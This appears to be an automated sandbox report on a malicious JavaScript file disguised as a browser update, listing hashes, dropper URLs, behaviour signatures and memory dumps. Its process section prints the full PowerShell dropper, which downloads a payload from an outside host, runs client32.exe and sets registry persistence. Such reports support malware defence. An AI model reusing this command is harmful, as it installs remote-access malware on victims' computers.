Analysis

  • max time kernel
    44s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    06-05-2024 12:50

General

  • Target

    Update_123.0.6312.111.js

  • Size

    22.4MB

  • MD5

    c0e810d8e3142bfc0c5cd606e1316f5f

  • SHA1

    61f4b334b4a2a723469a65a3c16361f578b7ef2d

  • SHA256

    c44c75c3724806765edb1de79f9c459980537761769d54dc173540cf7d0775f5

  • SHA512

    3f527308119d90e39ec431366020842873d3d1da3886aadca04d8e8f1509324742766d6b0663af1e2f42f5416d4c2015a89afde18248e6e746e6bcd700267a87

  • SSDEEP

    49152:I7VIzjCxbeqHlp4WhwN0b/hJ9EiItYzYqmZV+86OL3t0/r39GoD53quUQKugpcEa:W

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://pdd888167.top/data.php?7057

exe.dropper

https://pdd888167.top/data.php?7057

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_123.0.6312.111.js
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $qMSSBTXhvfmaJWXnVHAMIw='https://pdd888167.top/data.php?7057';$jBkPsCycfpeERMLByHQYDlmTNfYPBOeKc=(New-Object System.Net.WebClient).DownloadString($qMSSBTXhvfmaJWXnVHAMIw);$YhNRjithmKiQRFDLUauFGKgNjUGQo=[System.Convert]::FromBase64String($jBkPsCycfpeERMLByHQYDlmTNfYPBOeKc);$zxc = Get-Random -Minimum -10 -Maximum 37; $iOmEHKWGIbblnRJDLgltThqvLJHS=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $iOmEHKWGIbblnRJDLgltThqvLJHS -PathType Container)) { New-Item -Path $iOmEHKWGIbblnRJDLgltThqvLJHS -ItemType Directory };$p=Join-Path $iOmEHKWGIbblnRJDLgltThqvLJHS 'ah.zip';[System.IO.File]::WriteAllBytes($p,$YhNRjithmKiQRFDLUauFGKgNjUGQo);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$iOmEHKWGIbblnRJDLgltThqvLJHS)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $iOmEHKWGIbblnRJDLgltThqvLJHS 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $iOmEHKWGIbblnRJDLgltThqvLJHS -Force; $AZ.attributes='Hidden';$s=$iOmEHKWGIbblnRJDLgltThqvLJHS+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1652
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2888

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1652-20-0x000007FEF5E1E000-0x000007FEF5E1F000-memory.dmp

      Filesize

      4KB

    • memory/1652-21-0x000000001B680000-0x000000001B962000-memory.dmp

      Filesize

      2.9MB

    • memory/1652-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/1652-23-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

      Filesize

      9.6MB

    • memory/1652-24-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

      Filesize

      9.6MB

    • memory/1652-25-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

      Filesize

      9.6MB

    • memory/1652-26-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

      Filesize

      9.6MB

    • memory/1652-27-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

      Filesize

      9.6MB